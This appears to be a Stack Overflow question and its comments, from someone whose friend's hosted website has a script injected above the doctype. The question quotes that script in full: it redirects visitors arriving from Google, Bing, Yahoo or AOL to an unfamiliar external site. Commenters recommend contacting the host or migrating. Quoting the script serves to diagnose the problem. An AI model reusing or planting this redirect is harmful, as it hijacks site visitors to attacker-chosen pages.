# Can I stop a malicious script from running without removing the malicious script itself?

Tags: javascript, html, security

My question: How can I mitigate an inserted "script" from redirecting a user?

The Situation :
I have a friend that has a website hosted by Network Solutions. Recently a script appeared and it is being inserted at the top of the DOM file that is received when a user requests the home page.
 The script redirects users that navigate from Yahoo, Google, Bing, and AOL domains. The redirection goes to a site we have never heard of.

The conditions:
The Network Solutions account does not allow direct access to any server code. We can only use their GUI tools which allow html inserts.

below is the malicious script :

```
<script>
var s=document.referrer;
if(s.indexOf("google")>0 || s.indexOf("bing")>0 || s.indexOf("aol")>0 ||     s.indexOf("yahoo")>0)
{
self.location='http://www.pickredbag.com/';
}
</script>
```

This script appears above the !Doctype tag and I cannot remove it.

Comment: If this is at the top of the document, it is going to be executed before any possible fix on your part...

Comment: I would contact Network Solutions, they will probably resolve this issue for you.

Comment: Sounds like your friend needs to dump this obvious security breach in the lap of Network Solutions customer support, since they're clearly responsible for security if they don't provide access to allow the customer to maintain it.

Comment: I would contact the hosting company support.

Comment: @Chris Yes, the code appears before anything that we put in.

Comment: Network solutions refuses to help and says its Googles and AOL's fault. They intern said it was Network Solutions. I believe its in the server code somewhere and I am not allowed access to that.

Comment: Their crappy code is the reason I'm affected from bingo.com? Unbelievable.

Comment: I agree with dropping Network Solutions and porting her site to a vps we have control over.

Comment: You have control over your DNS at least? Direct your traffic to an animated gif of a construction worker digging a hole pronto.

Comment: @Cyberdelphos thank you, I am looking into the SSI suggestion you made, and I agree with your sentiment.

Comment: update: I can access the server files now and I found the default.asp was tampered with. I found a few similar problems on the web too. https://productforums.google.com/forum/#!topic/webmasters/5reAKMNBnBI

Comment: Possible duplicate of [Stop slow-loading script with GreaseMonkey](https://stackoverflow.com/questions/3190356/stop-slow-loading-script-with-greasemonkey)